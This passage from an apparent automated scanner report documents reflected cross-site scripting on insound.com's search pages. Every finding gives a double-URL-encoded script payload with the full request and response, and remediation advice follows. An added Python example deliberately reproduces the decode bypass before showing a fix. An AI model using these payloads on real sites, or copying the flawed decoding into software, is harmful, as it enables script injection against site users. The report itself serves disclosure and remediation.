GET /search/query/Candyskins529f5%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9ac8e9c7a2d&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:39:14 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=mqjgvkonbu2lf1svf83phb1g92; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:39:14 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=561458590; expires=Sun, 09-Jan-2011 02:39:14 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=496896762; expires=Sun, 09-Jan-2011 02:39:14 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 19002

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<input type="hidden" name="query" value="Candyskins529f5"><script>alert(1)</script>9ac8e9c7a2d" />
...[SNIP]...

1.58. http://www.insound.com/search/query/Candyskins&from=47597/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Candyskins&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload 783a3%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9eab33f8a4e was submitted in the REST URL parameter 3. This input was echoed as 783a3</title><script>alert(1)</script>9eab33f8a4e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3, as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out. Removing the second decode closes this particular bypass but is not a complete fix: the value is written between the TITLE tags with no HTML encoding, so it should be HTML-encoded at that point regardless of which characters the filter rejects.

Request

GET /search/query/Candyskins783a3%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9eab33f8a4e&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:39:20 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=d721auoi1503uhfnup26uvhsj7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:39:20 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=514777627; expires=Sun, 09-Jan-2011 02:39:20 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=313139826; expires=Sun, 09-Jan-2011 02:39:20 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 19018

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<title>Candyskins783a3</title><script>alert(1)</script>9eab33f8a4e</title>
...[SNIP]...
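The decode chain behind the two sinks in this report (the TITLE text of finding 1.58 and the hidden query attribute of findings 1.57 and 1.59), as an added example that is not insound.com's code and not part of the XSS.CX report. It assumes, and these are assumptions rather than facts from the report, that the web server percent-decodes the path segment once, that the application's filter rejects the characters <, > and " on that value, and that the application then URL-decodes the value a second time before writing it unencoded into the page. The payload strings are copied from the requests above. vulnerable_search reproduces the echoed strings shown in the report and also shows why a single-encoded payload is stopped; fixed_search decodes once, validates the canonical value and HTML-encodes on output.

```python
"""Double URL-decoding bypass behind the /search/query/<term> findings,
modelled as an added example (not insound.com's code).  Assumed: the web
server percent-decodes the path segment once, the application's blocklist
rejects '<', '>' and '"' on that value, and the application then decodes
the value a second time before writing it into the page unencoded."""
import html
from typing import Optional
from urllib.parse import unquote

# Characters the filter is assumed to reject.  "'" is deliberately absent:
# the report shows Cap'n%20Jazz being accepted as a search term.
BLOCKED = set('<>"')

# Scanner payloads copied from findings 1.58 (title sink) and 1.59 (attribute sink).
TITLE_PAYLOAD = ("Candyskins783a3%253c%252ftitle%253e%253cscript%253ealert%25281%2529"
                 "%253c%252fscript%253e9eab33f8a4e")
ATTR_PAYLOAD = ("Canned%20Heat41aff%2522%253e%253cscript%253ealert%25281%2529"
                "%253c%252fscript%253ed026fc4a7ff")
# The same attack single-encoded, which the blocklist does stop (constructed).
SINGLE_ENCODED = "Candyskins%22%3e%3cscript%3ealert%281%29%3c%2fscript%3e"


def server_decode(raw_segment: str) -> str:
    """The one percent-decode the web server performs before the application runs."""
    return unquote(raw_segment)


def blocklist_allows(value: str) -> bool:
    """Validation as the report describes it: reject if any blocked character is present."""
    return not (BLOCKED & set(value))


def render(term: str) -> str:
    """The two sinks seen in every finding: TITLE text and a double-quoted attribute."""
    return ('<title>%s</title>\n'
            '<input type="hidden" name="query" value="%s" />' % (term, term))


def vulnerable_search(raw_segment: str) -> Optional[str]:
    """Validate the once-decoded value, then decode again: the bypass in the report."""
    once = server_decode(raw_segment)
    if not blocklist_allows(once):
        return None                       # request rejected by the filter
    term = unquote(once)                  # second decode turns %3c back into '<'
    return render(term)                   # written into the page unencoded


def fixed_search(raw_segment: str, validate: bool = True) -> Optional[str]:
    """Canonicalise exactly once, validate that value, and encode on output."""
    term = server_decode(raw_segment)     # no further decoding after this point
    if validate and not blocklist_allows(term):
        return None                       # optional defence in depth, on the canonical value
    safe = html.escape(term, quote=True)  # the actual fix: neutralises < > & " ' in both sinks
    return render(safe)


if __name__ == "__main__":
    print(vulnerable_search(TITLE_PAYLOAD))     # echoes </title><script>alert(1)</script>
    print(vulnerable_search(SINGLE_ENCODED))    # None: single encoding is caught
    print(fixed_search(TITLE_PAYLOAD))          # literal %3c sequences, no script tag
    print(fixed_search(SINGLE_ENCODED, validate=False))  # &lt;script&gt;, even without the blocklist
```

With the double-encoded payload the fixed version renders the literal %3c and %3e sequences in the title, which is the correct result for a search term that really contained them; the validate=False call shows that output encoding alone is sufficient, and that the blocklist is only defence in depth.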

1.59. http://www.insound.com/search/query/Canned%20Heat&from=47597/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Canned%20Heat&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 41aff%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ed026fc4a7ff was submitted in the REST URL parameter 3. This input was echoed as 41aff"><script>alert(1)</script>d026fc4a7ff in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3, as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out. Removing the second decode closes this particular bypass but is not a complete fix: the value is written into a double-quoted attribute value with no HTML encoding, so it should be HTML-encoded (including the double-quote character) at that point regardless of which characters the filter rejects.

Request

GET /search/query/Canned%20Heat41aff%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ed026fc4a7ff&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:39:16 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=6hh5tggsnb108ebi3sqkb725o5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:39:16 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=424517373; expires=Sun, 09-Jan-2011 02:39:16 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=555535607; expires=Sun, 09-Jan-2011 02:39:16 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 37199

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<input type="hidden" name="query" value="Canned Heat41aff"><script>alert(1)</script>d026fc4a7ff" />
...[SNIP]...

1.60. http://www.insound.com/search/query/Canned%20Heat&from=47597/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Canned%20Heat&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload 87cee%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e945b3aae3a0 was submitted in the REST URL parameter 3. This input was echoed as 87cee</title><script>alert(1)</script>945b3aae3a0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3, as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out. Removing the second decode closes this particular bypass but is not a complete fix: the value is written between the TITLE tags with no HTML encoding, so it should be HTML-encoded at that point regardless of which characters the filter rejects.

Request

GET /search/query/Canned%20Heat87cee%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e945b3aae3a0&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:39:23 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=1chgfconqiisvs7u4qe0qkupt6; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:39:23 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=370527039; expires=Sun, 09-Jan-2011 02:39:23 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=490016212; expires=Sun, 09-Jan-2011 02:39:23 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 37279

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<title>Canned Heat87cee</title><script>alert(1)</script>945b3aae3a0</title>
...[SNIP]...

1.61. http://www.insound.com/search/query/Cannibal%20Ox&from=47597/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Cannibal%20Ox&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload b63a3%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e66a032306b4 was submitted in the REST URL parameter 3. This input was echoed as b63a3</title><script>alert(1)</script>66a032306b4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3, as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out. Removing the second decode closes this particular bypass but is not a complete fix: the value is written between the TITLE tags with no HTML encoding, so it should be HTML-encoded at that point regardless of which characters the filter rejects.

Request

GET /search/query/Cannibal%20Oxb63a3%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e66a032306b4&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:39:32 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=6rokmsuat1mtmj2urrobr7s813; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:39:32 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=533483587; expires=Sun, 09-Jan-2011 02:39:32 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=130784695; expires=Sun, 09-Jan-2011 02:39:32 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 36787

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<title>Cannibal Oxb63a3</title><script>alert(1)</script>66a032306b4</title>
...[SNIP]...

1.62. http://www.insound.com/search/query/Cannibal%20Ox&from=47597/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Cannibal%20Ox&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9f188%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e83905858b22 was submitted in the REST URL parameter 3. This input was echoed as 9f188"><script>alert(1)</script>83905858b22 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3, as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out. Removing the second decode closes this particular bypass but is not a complete fix: the value is written into a double-quoted attribute value with no HTML encoding, so it should be HTML-encoded (including the double-quote character) at that point regardless of which characters the filter rejects.

Request

GET /search/query/Cannibal%20Ox9f188%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e83905858b22&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:39:24 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=5f4ak8mrqkfpilsm0uudu8hc50; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:39:24 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=401603714; expires=Sun, 09-Jan-2011 02:39:24 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=519769309; expires=Sun, 09-Jan-2011 02:39:24 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 36747

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<input type="hidden" name="query" value="Cannibal Ox9f188"><script>alert(1)</script>83905858b22" />
...[SNIP]...

1.63. http://www.insound.com/search/query/Cansei%20De%20Ser%20Sexy&from=47597/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Cansei%20De%20Ser%20Sexy&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dcde0%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea2c1cf0e8a was submitted in the REST URL parameter 3. This input was echoed as dcde0"><script>alert(1)</script>a2c1cf0e8a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3, as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out. Removing the second decode closes this particular bypass but is not a complete fix: the value is written into a double-quoted attribute value with no HTML encoding, so it should be HTML-encoded (including the double-quote character) at that point regardless of which characters the filter rejects.

Request

GET /search/query/Cansei%20De%20Ser%20Sexydcde0%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea2c1cf0e8a&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:39:21 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=npiqgdqh8uticn63ajdvdm8ce2; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:39:21 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=489373266; expires=Sun, 09-Jan-2011 02:39:21 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=472335197; expires=Sun, 09-Jan-2011 02:39:21 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 37036

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<input type="hidden" name="query" value="Cansei De Ser Sexydcde0"><script>alert(1)</script>a2c1cf0e8a" />
...[SNIP]...

1.64. http://www.insound.com/search/query/Cansei%20De%20Ser%20Sexy&from=47597/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Cansei%20De%20Ser%20Sexy&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload 4aaa5%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e098fa7fb1b1 was submitted in the REST URL parameter 3. This input was echoed as 4aaa5</title><script>alert(1)</script>098fa7fb1b1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3, as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out. Removing the second decode closes this particular bypass but is not a complete fix: the value is written between the TITLE tags with no HTML encoding, so it should be HTML-encoded at that point regardless of which characters the filter rejects.

Request

GET /search/query/Cansei%20De%20Ser%20Sexy4aaa5%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e098fa7fb1b1&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:39:28 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=k8ugv1qrlkltje4crrr1ac61j1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:39:28 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=314825418; expires=Sun, 09-Jan-2011 02:39:28 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=76478598; expires=Sun, 09-Jan-2011 02:39:28 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 37127

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<title>Cansei De Ser Sexy4aaa5</title><script>alert(1)</script>098fa7fb1b1</title>
...[SNIP]...

1.65. http://www.insound.com/search/query/Canyon&from=47597/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Canyon&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c8160%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea86437928d7 was submitted in the REST URL parameter 3. This input was echoed as c8160"><script>alert(1)</script>a86437928d7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3, as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out. Removing the second decode closes this particular bypass but is not a complete fix: the value is written into a double-quoted attribute value with no HTML encoding, so it should be HTML-encoded (including the double-quote character) at that point regardless of which characters the filter rejects.

Request

GET /search/query/Canyonc8160%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea86437928d7&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:39:25 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=el64g281vs55aad7dvp7ahk394; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:39:25 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=484649954; expires=Sun, 09-Jan-2011 02:39:25 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=41901122; expires=Sun, 09-Jan-2011 02:39:25 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 18990

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<input type="hidden" name="query" value="Canyonc8160"><script>alert(1)</script>a86437928d7" />
...[SNIP]...

1.66. http://www.insound.com/search/query/Canyon&from=47597/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Canyon&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload 82e50%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e0857b329499 was submitted in the REST URL parameter 3. This input was echoed as 82e50</title><script>alert(1)</script>0857b329499 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3, as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out. Removing the second decode closes this particular bypass but is not a complete fix: the value is written between the TITLE tags with no HTML encoding, so it should be HTML-encoded at that point regardless of which characters the filter rejects.

Request

GET /search/query/Canyon82e50%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e0857b329499&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:39:31 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=vn8103gq26jdh08g4ktseqboj1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:39:32 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=490445033; expires=Sun, 09-Jan-2011 02:39:32 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=319315191; expires=Sun, 09-Jan-2011 02:39:32 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 19006

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<title>Canyon82e50</title><script>alert(1)</script>0857b329499</title>
...[SNIP]...

1.67. http://www.insound.com/search/query/Canyons&from=47597/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Canyons&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c4aec%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e0586550ec47 was submitted in the REST URL parameter 3. This input was echoed as c4aec"><script>alert(1)</script>0586550ec47 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3, as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out. Removing the second decode closes this particular bypass but is not a complete fix: the value is written into a double-quoted attribute value with no HTML encoding, so it should be HTML-encoded (including the double-quote character) at that point regardless of which characters the filter rejects.

Request

